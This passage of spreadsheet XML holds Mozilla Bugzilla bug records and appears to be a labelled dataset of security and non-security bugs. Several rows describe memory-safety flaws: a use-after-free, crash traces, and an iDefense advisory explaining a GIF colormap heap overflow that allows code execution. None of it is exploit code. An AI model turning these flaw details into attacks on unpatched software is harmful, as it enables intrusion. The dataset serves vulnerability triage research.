  rfrees  by size class: 8:115976; 9:19137; 10:7708; 11:8747; 12:536; 13:469; 14:336; 15:146; 16:338; 17:189; 18:28; 19:5; 20:1;
Stats: malloc large: 1516 small slow: 1815
==12169== ABORTING</t>
        </is>
      </c>
      <c r="X4741" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4742">
      <c r="A4742" t="n">
        <v>949843</v>
      </c>
      <c r="B4742" t="inlineStr">
        <is>
          <t>2013-12-12 18:51:19 -0800</t>
        </is>
      </c>
      <c r="C4742" t="inlineStr">
        <is>
          <t>Don't use "char* str = NS_ConvertUTF16toUTF8(aBdAddress).get();"</t>
        </is>
      </c>
      <c r="D4742" t="inlineStr">
        <is>
          <t>2015-02-25 21:52:59 -0800</t>
        </is>
      </c>
      <c r="E4742" t="n">
        <v>1</v>
      </c>
      <c r="F4742" t="n">
        <v>1</v>
      </c>
      <c r="G4742" t="n">
        <v>6</v>
      </c>
      <c r="H4742" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4742" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4742" t="inlineStr">
        <is>
          <t>Bluetooth</t>
        </is>
      </c>
      <c r="K4742" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4742" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4742" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4742" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4742" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4742" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q4742" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4742" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4742" t="inlineStr">
        <is>
          <t>1.3 C2/1.4 S2(17jan)</t>
        </is>
      </c>
      <c r="T4742" t="n">
        <v>1</v>
      </c>
      <c r="U4742" t="n">
        <v>0</v>
      </c>
      <c r="V4742" t="n">
        <v>17</v>
      </c>
      <c r="W4742" t="inlineStr">
        <is>
          <t>This means,
char *str;
{
  NS_ConvertUTF16toUTF8 tmp(aBdAddress);
  str = tmp;
}
... (use str) ...
so when using str, buffer is already freed.  This becomes use-after-free.
/dom/bluetooth/bluedroid/gonk/BluetoothServiceBluedroid.cpp (View Hg log or Hg annotations)
    line 249 -- const char* str = NS_ConvertUTF16toUTF8(aBdAddress).get();
    line 1004 -- const char* name = NS_ConvertUTF16toUTF8(str).get();</t>
        </is>
      </c>
      <c r="X4742" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4743">
      <c r="A4743" t="n">
        <v>1047831</v>
      </c>
      <c r="B4743" t="inlineStr">
        <is>
          <t>2014-08-02 03:43:47 -0700</t>
        </is>
      </c>
      <c r="C4743" t="inlineStr">
        <is>
          <t>Out-of-bounds Read in mozilla::dom::AudioEventTimeline&lt;mozilla::ErrorResult&gt;::ExtractValueFromCurve</t>
        </is>
      </c>
      <c r="D4743" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:21 -0700</t>
        </is>
      </c>
      <c r="E4743" t="n">
        <v>1</v>
      </c>
      <c r="F4743" t="n">
        <v>1</v>
      </c>
      <c r="G4743" t="n">
        <v>3</v>
      </c>
      <c r="H4743" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4743" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4743" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K4743" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L4743" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4743" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4743" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4743" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4743" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q4743" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4743" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4743" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T4743" t="n">
        <v>1</v>
      </c>
      <c r="U4743" t="n">
        <v>0</v>
      </c>
      <c r="V4743" t="n">
        <v>22</v>
      </c>
      <c r="W4743" t="inlineStr">
        <is>
          <t>Created attachment 8466646
testcase.html
Stacktrace: (from FatalSignalHandler):
Assertion failure: ratio &gt;= 0.0 (Ratio can never be negative here), at ../../../dist/include/AudioEventTimeline.h:425
#5  mozilla::dom::AudioEventTimeline&lt;mozilla::ErrorResult&gt;::ExtractValueFromCurve (startTime=&lt;optimized out&gt;, 
    aCurve=&lt;optimized out&gt;, aCurveLength=&lt;optimized out&gt;, duration=&lt;optimized out&gt;, t=&lt;optimized out&gt;)
    at ../../../dist/include/AudioEventTimeline.h:425
#6  0x00007f04e6ecfdee in mozilla::dom::AudioEventTimeline&lt;mozilla::ErrorResult&gt;::GetValueAtTime&lt;double&gt; (
    this=0x60c0003115e0, aTime=-nan(0xfffffffffffff)) at ../../../dist/include/AudioEventTimeline.h:258
#7  0x00007f04e6ebf8a7 in mozilla::dom::BiquadFilterNode::GetFrequencyResponse (this=0x610000153e40, 
    aFrequencyHz=..., aMagResponse=..., aPhaseResponse=...)
    at /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/webaudio/BiquadFilterNode.cpp:338
#8  0x00007f04e55f777c in mozilla::dom::BiquadFilterNodeBinding::getFrequencyResponse (cx=0x615000ac5b00, 
    self=&lt;optimized out&gt;, args=..., obj=...) at ./BiquadFilterNodeBinding.cpp:256
...</t>
        </is>
      </c>
      <c r="X4743" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4744">
      <c r="A4744" t="n">
        <v>1233925</v>
      </c>
      <c r="B4744" t="inlineStr">
        <is>
          <t>2015-12-18 18:43:36 -0800</t>
        </is>
      </c>
      <c r="C4744" t="inlineStr">
        <is>
          <t>Crash [@ JSObject::allocKindForTenure] with rest parameter</t>
        </is>
      </c>
      <c r="D4744" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:24 -0700</t>
        </is>
      </c>
      <c r="E4744" t="n">
        <v>1</v>
      </c>
      <c r="F4744" t="n">
        <v>1</v>
      </c>
      <c r="G4744" t="n">
        <v>3</v>
      </c>
      <c r="H4744" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4744" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4744" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4744" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4744" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4744" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4744" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4744" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4744" t="inlineStr">
        <is>
          <t>[jsbugmon:update,testComment=11,origRev=7c83da46ea74,ignore][fuzzblocker][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q4744" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4744" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4744" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T4744" t="n">
        <v>1</v>
      </c>
      <c r="U4744" t="n">
        <v>0</v>
      </c>
      <c r="V4744" t="n">
        <v>28</v>
      </c>
      <c r="W4744" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 66fb852962c0 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --no-threads --disable-oom-functions main.js):
See attachment.
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
JSObject::allocKindForTenure (this=0x7ffff54fff90, nursery=...) at ../../dist/include/js/Proxy.h:434
#0  JSObject::allocKindForTenure (this=0x7ffff54fff90, nursery=...) at ../../dist/include/js/Proxy.h:434
#1  0x0000000000bdccc4 in js::TenuringTracer::moveToTenured (this=0x7fffffec7b50, src=0x7ffff54fff90) at js/src/gc/Marking.cpp:2070
#2  0x0000000000bdd0ab in js::TenuringTracer::traverse&lt;JSObject&gt; (this=&lt;optimized out&gt;, objp=0x7fffffec78d0) at js/src/gc/Marking.cpp:1940
#3  0x0000000000bf15fd in operator()&lt;JSObject&gt; (this=&lt;synthetic pointer&gt;, trc=&lt;optimized out&gt;, t=0x7ffff54fff90) at js/src/gc/Marking.cpp:1946
#4  js::DispatchTyped&lt;js::TenuringTraversalFunctor&lt;JS::Value&gt;, js::TenuringTracer* const&gt;(js::TenuringTraversalFunctor&lt;JS::Value&gt;, JS::Value const&amp;, (decltype ({parm#1}((JSObject*)((decltype(nullptr))0), (Forward&lt;js::TenuringTracer* const&gt;)({parm#3})))&amp;&amp;)...) (f=f@entry=..., val=...) at ../../dist/include/js/Value.h:1885
#5  0x0000000000bdf777 in traverse&lt;JS::Value&gt; (thingp=0x7ffff506e130, this=0x7fffffec7b50) at js/src/gc/Marking.cpp:1955
#6  traceSlots (end=0x7ffff506e138, vp=0x7ffff506e130, this=0x7fffffec7b50) at js/src/gc/Marking.cpp:2163
#7  js::TenuringTracer::traceObject (this=this@entry=0x7fffffec7b50, obj=obj@entry=0x7ffff506e100) at js/src/gc/Marking.cpp:2139
#8  0x0000000000bdfa28 in js::Nursery::collectToFixedPoint (this=this@entry=0x7ffff695d468, mover=..., tenureCounts=...) at js/src/gc/Marking.cpp:2103
#9  0x0000000000be0b14 in js::Nursery::collect (this=this@entry=0x7ffff695d468, rt=0x7ffff695d000, reason=reason@entry=JS::gcreason::OUT_OF_NURSERY, pretenureGroups=pretenureGroups@entry=0x7fffffec7ea0) at js/src/gc/Nursery.cpp:484
#10 0x00000000008e8c65 in js::gc::GCRuntime::minorGCImpl (this=this@entry=0x7ffff695d410, reason=reason@entry=JS::gcreason::OUT_OF_NURSERY, pretenureGroups=pretenureGroups@entry=0x7fffffec7ea0) at js/src/jsgc.cpp:6619
#11 0x00000000008f2709 in js::gc::GCRuntime::minorGC (this=this@entry=0x7ffff695d410, cx=cx@entry=0x7ffff6907400, reason=reason@entry=JS::gcreason::OUT_OF_NURSERY) at js/src/jsgc.cpp:6631
#12 0x0000000000bcc27a in tryNewNurseryObject&lt;(js::AllowGC)1&gt; (clasp=0x1b67900 &lt;js::ArrayObject::class_&gt;, nDynamicSlots=0, thingSize=64, cx=0x7ffff6907400, this=0x7ffff695d410) at js/src/gc/Allocator.cpp:159
#13 js::Allocate&lt;JSObject, (js::AllowGC)1&gt; (cx=cx@entry=0x7ffff6907400, kind=kind@entry=js::gc::OBJECT4_BACKGROUND, nDynamicSlots=0, heap=heap@entry=js::gc::DefaultHeap, clasp=0x1b67900 &lt;js::ArrayObject::class_&gt;) at js/src/gc/Allocator.cpp:125
#14 0x000000000052fc0d in js::ArrayObject::createArrayInternal (cx=0x7ffff6907400, kind=js::gc::OBJECT4_BACKGROUND, heap=js::gc::DefaultHeap, shape=..., group=...) at js/src/vm/ArrayObject-inl.h:54
#15 0x000000000052fe10 in js::ArrayObject::createArray (cx=cx@entry=0x7ffff6907400, kind=kind@entry=js::gc::OBJECT4_BACKGROUND, heap=&lt;optimized out&gt;, shape=..., shape@entry=..., group=..., group@entry=..., length=length@entry=1, metadata=...) at js/src/vm/ArrayObject-inl.h:82
#16 0x0000000000519727 in NewArray&lt;4294967295u&gt; (cxArg=0x7ffff6907400, length=1, protoArg=..., newKind=js::GenericObject) at js/src/jsarray.cpp:3374
#17 0x000000000051c19e in js::NewDenseCopiedArray (cx=&lt;optimized out&gt;, length=length@entry=1, values=values@entry=0x7fffffec82f8, proto=..., proto@entry=..., newKind=&lt;optimized out&gt;) at js/src/jsarray.cpp:3439
#18 0x00000000007fdff5 in js::jit::InitRestParameter (cx=&lt;optimized out&gt;, length=1, rest=0x7fffffec82f8, templateObj=..., objRes=...) at js/src/jit/VMFunctions.cpp:931
#19 0x00007ffff7fed8dd in ?? ()
[...]
#29 0x0000000000000000 in ?? ()
rax	0x7ffff4f74af0	140737303235312
rbx	0x7ffff54fff90	140737309048720
rcx	0x1ba9c00	29006848
rdx	0xfffc7ffff4f724c0	-985162603617088
rsi	0x7ffff695d468	140737330402408
rdi	0x7ffff54fff90	140737309048720
rbp	0x7fffffec7820	140737487075360
rsp	0x7fffffec7800	140737487075328
r8	0x0	0
r9	0x7ffff5107150	140737304883536
r10	0x7ffff5107000	140737304883200
r11	0x1f	31
r12	0x1bb4800	29050880
r13	0x1bb5268	29053544
r14	0x7fffffec7900	140737487075584
r15	0x7ffff506e100	140737304256768
rip	0x92b8a4 &lt;JSObject::allocKindForTenure(js::Nursery const&amp;) const+68&gt;
=&gt; 0x92b8a4 &lt;JSObject::allocKindForTenure(js::Nursery const&amp;) const+68&gt;:	mov    0x8(%rdx),%ecx
   0x92b8a7 &lt;JSObject::allocKindForTenure(js::Nursery const&amp;) const+71&gt;:	test   $0x100000,%ecx
Marking as s-s because this is a fragile GC-related crash with weird memory address. I was not able to merge the files into a single-file testcase. Bonus points if you can show me how to do that (in particular, replacing load with evaluate totally did not work in this testcase, not even with all the options I tried for evaluate).</t>
        </is>
      </c>
      <c r="X4744" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4745">
      <c r="A4745" t="n">
        <v>515260</v>
      </c>
      <c r="B4745" t="inlineStr">
        <is>
          <t>2009-09-08 16:07:11 -0700</t>
        </is>
      </c>
      <c r="C4745" t="inlineStr">
        <is>
          <t>[Taskfox] Stop the return key from submitting a blank search</t>
        </is>
      </c>
      <c r="D4745" t="inlineStr">
        <is>
          <t>2009-10-14 16:24:43 -0700</t>
        </is>
      </c>
      <c r="E4745" t="n">
        <v>1</v>
      </c>
      <c r="F4745" t="n">
        <v>1</v>
      </c>
      <c r="G4745" t="n">
        <v>2</v>
      </c>
      <c r="H4745" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4745" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4745" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4745" t="inlineStr">
        <is>
          <t>3.5 Branch</t>
        </is>
      </c>
      <c r="L4745" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4745" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4745" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4745" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4745" t="inlineStr">
        <is>
          <t>[Taskfox]</t>
        </is>
      </c>
      <c r="Q4745" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4745" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4745" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4745" t="n">
        <v>1</v>
      </c>
      <c r="U4745" t="n">
        <v>0</v>
      </c>
      <c r="V4745" t="n">
        <v>2</v>
      </c>
      <c r="W4745" t="inlineStr">
        <is>
          <t>When using the build I have of Taskfox, I see the following undesirable behavior:
1. Type "Go" to get Google to show up as an action in the autocomplete list
2. Press the down arrow to move to the Google action
3. Hit the return key to select the action
4. An empty search is submitted
What should happen instead:
4. You are placed back in the URL bar with the action selected, and can type your search query
This might already be fixed in the repository, so double check before investing effort in it. I know that the latest binary is a little bit behind. :)</t>
        </is>
      </c>
      <c r="X4745" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4746">
      <c r="A4746" t="n">
        <v>511689</v>
      </c>
      <c r="B4746" t="inlineStr">
        <is>
          <t>2009-08-20 10:56:14 -0700</t>
        </is>
      </c>
      <c r="C4746" t="inlineStr">
        <is>
          <t>GIF Color Map Parsing Buffer Overflow Vulnerability -- iDefense [V-jb9pzo6q1s]</t>
        </is>
      </c>
      <c r="D4746" t="inlineStr">
        <is>
          <t>2009-11-09 18:24:54 -0800</t>
        </is>
      </c>
      <c r="E4746" t="n">
        <v>1</v>
      </c>
      <c r="F4746" t="n">
        <v>1</v>
      </c>
      <c r="G4746" t="n">
        <v>3</v>
      </c>
      <c r="H4746" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4746" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4746" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4746" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4746" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4746" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4746" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4746" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4746" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4746" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4746" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4746" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4746" t="n">
        <v>1</v>
      </c>
      <c r="U4746" t="n">
        <v>0</v>
      </c>
      <c r="V4746" t="n">
        <v>22</v>
      </c>
      <c r="W4746" t="inlineStr">
        <is>
          <t>This vulnerability was reported by iDefense to the security@mozilla.org alias.  I have replied requesting a testcase.  Credit should go to regenrecht.
-----
iDefense VCP Submission V-jb9pzo6q1s
08/20/2009
Mozilla Firefox GIF Color Map Parsing Buffer Overflow Vulnerability
Description: 
Remote exploitation of a buffer overflow in the Mozilla Foundation's libpr0n image processing library allows attackers to execute arbitrary code.
The libpr0n GIF parser was designed using a state machine which is represented as a series of switch/case statements. One particularly interesting state, 'gif_image_header', is responsible for interpreting a single image/frame description record. One of the fields, 'depth', specifies the number of bits per pixel in the image. A single GIF file may contain many images, each with a different color map associated.
Consider the source code from "mozilla\modules\libpr0n\decoders\gif\nsGIFDecoder2.cpp":
        mGIFStruct.local_colormap_size = 1 &lt;&lt; depth;
        PRUint32 paletteSize;
        if (mGIFStruct.images_decoded) {
          // Copy directly into the palette of current frame,
          // by pointing mColormap to that palette.
          mImageFrame-&gt;GetPaletteData(&amp;mColormap, &amp;paletteSize);
        } else {
          // First frame has local colormap, allocate space for it
          // as the image frame doesn't have its own palette
          paletteSize = sizeof(PRUint32) &lt;&lt; realDepth;
          if (!mGIFStruct.local_colormap) {
            mGIFStruct.local_colormap = (PRUint32*)PR_MALLOC(paletteSize);
            if (!mGIFStruct.local_colormap) {
              mGIFStruct.state = gif_oom;
              break;
            }
          }
          mColormap = mGIFStruct.local_colormap;
        }
        const PRUint32 size = 3 &lt;&lt; depth;
        if (paletteSize &gt; size) {
          // Clear the notfilled part of the colormap
          memset(((PRUint8*)mColormap) + size, 0, paletteSize - size);
        }
        if (len &lt; size) {
          // Use 'hold' pattern to get the image colormap
          GETN(size, gif_image_colormap);
          break;
        }
        // Copy everything, go to colormap state to do CMS correction
        memcpy(mColormap, buf, size);
The problem here is that it is possible to enter the 'gif_image_header' state more than once while still having 'mGIFStruct.images_decoded' be equal to zero. Normally 'images_decoded' is incremented after every whole image is decoded. However, by providing invalid LZW data, one can skip this step and enter the 'gif_image_header' state again.
On the second iteration, the branch with 'PR_MALLOC()' will not be taken since the local color map was already allocated in the previous iteration. As a result, the memory allocated for the color map remains the same size regardless of the 'depth' field of a second image. When the second image is processed, data is copied into the buffer without respect for the buffer's size. This results in an exploitable heap overflow condition.
Analysis: 
Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user running the vulnerable application. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites.
iDefense confirmed the existence of this vulnerability using Mozilla Firefox versions 3.0.13 and 3.5.2 on 32-bit Windows XP SP3. Other versions, and potentially other applications using libpr0n, are suspected to be vulnerable.
Credit: 
regenrecht</t>
        </is>
      </c>
      <c r="X4746" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4747">
      <c r="A4747" t="n">
        <v>364345</v>
      </c>
      <c r="B4747" t="inlineStr">
        <is>
          <t>2006-12-19 07:11:02 -0800</t>
        </is>
      </c>
      <c r="C4747" t="inlineStr">
        <is>
          <t>[FIX]Remove implementations of GetScrollBarDimensions</t>
        </is>
      </c>
      <c r="D4747" t="inlineStr">
        <is>
          <t>2009-01-22 10:17:43 -0800</t>
        </is>
      </c>
      <c r="E4747" t="n">
        <v>1</v>
      </c>
      <c r="F4747" t="n">
        <v>1</v>
      </c>
      <c r="G4747" t="n">
        <v>6</v>
      </c>
      <c r="H4747" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4747" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4747" t="inlineStr">
        <is>
          <t>GFX</t>
        </is>
      </c>
      <c r="K4747" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4747" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4747" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4747" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4747" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4747" t="inlineStr"/>
      <c r="Q4747" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4747" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4747" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T4747" t="n">
        <v>1</v>
      </c>
      <c r="U4747" t="n">
        <v>0</v>
      </c>
      <c r="V4747" t="n">
        <v>4</v>
      </c>
      <c r="W4747" t="inlineStr">
        <is>
          <t>Now that GetScrollBarDimensions has no more consumers is our chance to remove it!  ;)
Patch coming up.</t>
        </is>
      </c>
      <c r="X4747" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4748">
      <c r="A4748" t="n">
        <v>1359339</v>
      </c>
      <c r="B4748" t="inlineStr">
        <is>
          <t>2017-04-25 02:14:56 -0700</t>
        </is>
      </c>
      <c r="C4748" t="inlineStr">
        <is>
          <t>The icons of the the default top sites are oversized when starting Fennec in landscape (iPhone 6/7 Plus)</t>
        </is>
      </c>
      <c r="D4748" t="inlineStr">
        <is>
          <t>2017-07-21 00:57:36 -0700</t>
        </is>
      </c>
      <c r="E4748" t="n">
        <v>1</v>
      </c>
      <c r="F4748" t="n">
        <v>1</v>
      </c>
      <c r="G4748" t="n">
        <v>2</v>
      </c>
      <c r="H4748" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4748" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4748" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K4748" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4748" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4748" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4748" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4748" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4748" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q4748" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4748" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4748" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4748" t="n">
        <v>1</v>
      </c>
      <c r="U4748" t="n">
        <v>0</v>
      </c>
      <c r="V4748" t="n">
        <v>10</v>
      </c>
      <c r="W4748" t="inlineStr">
        <is>
          <t>master f9f4cf1ba
iPhone 6 Plus (10.3)
1. Place the device in landscape.
2. Install Firefox via Xcode. 
3. "Start Browsing" in First Run Tour.
4. Check the top sites in landscape.
Result: http://imgur.com/W2NINTD
5. Switch to portrait.
Result: http://imgur.com/a/Reier</t>
        </is>
      </c>
      <c r="X4748" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4749">
      <c r="A4749" t="n">
        <v>1584217</v>
      </c>
      <c r="B4749" t="inlineStr">
        <is>
          <t>2019-09-26 07:22:23 -0700</t>
        </is>
      </c>
      <c r="C4749" t="inlineStr">
        <is>
          <t>Intermittent [taskcluster:error] Task timeout after 3600 seconds. Force killing container.</t>
        </is>
      </c>
      <c r="D4749" t="inlineStr">
        <is>
          <t>2019-09-29 23:42:14 -0700</t>
        </is>
      </c>
      <c r="E4749" t="n">
        <v>1</v>
      </c>
      <c r="F4749" t="n">
        <v>1</v>
      </c>
      <c r="G4749" t="n">
        <v>7</v>
      </c>
      <c r="H4749" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4749" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J4749" t="inlineStr">
        <is>
          <t>Toolchains</t>
        </is>
      </c>
      <c r="K4749" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4749" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4749" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4749" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4749" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4749" t="inlineStr"/>
      <c r="Q4749" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4749" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4749" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T4749" t="n">
        <v>1</v>
      </c>
      <c r="U4749" t="n">
        <v>0</v>
      </c>
      <c r="V4749" t="n">
        <v>6</v>
      </c>
      <c r="W4749" t="inlineStr">
        <is>
          <t>**Filed by:** aiakab [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=268549901&amp;repo=autoland
**Full log:** https://queue.taskcluster.net/v1/task/MfOy4ZeMRQq7s6Nb23w5Zg/runs/1/artifacts/public/logs/live_backing.log
---
[task 2019-09-26T12:44:23.481Z] [3457/3798] /builds/worker/fetches/llvm-project/build/stage2/clang/bin/clang++  -DGTEST_HAS_RTTI=0 -D_GNU_SOURCE -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS -Itools/llvm-dwp -I/builds/worker/fetches/llvm-project/llvm/tools/llvm-dwp -Iinclude -I/builds/worker/fetches/llvm-project/llvm/include -fPIC -Qunused-arguments -gcc-toolchain /builds/worker/fetches/llvm-project/build/stage1/clang -fPIC -fvisibility-inlines-hidden -Werror=date-time -Werror=unguarded-availability-new -std=c++11 -Wall -Wextra -Wno-unused-parameter -Wwrite-strings -Wcast-qual -Wmissing-field-initializers -pedantic -Wno-long-long -Wimplicit-fallthrough -Wcovered-switch-default -Wno-noexcept-type -Wnon-virtual-dtor -Wdelete-non-virtual-dtor -Wstring-conversion -fdiagnostics-color -ffunction-sections -fdata-sections -O3 -DNDEBUG    -fno-exceptions -fno-rtti -MD -MT tools/llvm-dwp/CMakeFiles/llvm-dwp.dir/DWPError.cpp.o -MF tools/llvm-dwp/CMakeFiles/llvm-dwp.dir/DWPError.cpp.o.d -o tools/llvm-dwp/CMakeFiles/llvm-dwp.dir/DWPError.cpp.o -c /builds/worker/fetches/llvm-project/llvm/tools/llvm-dwp/DWPError.cpp
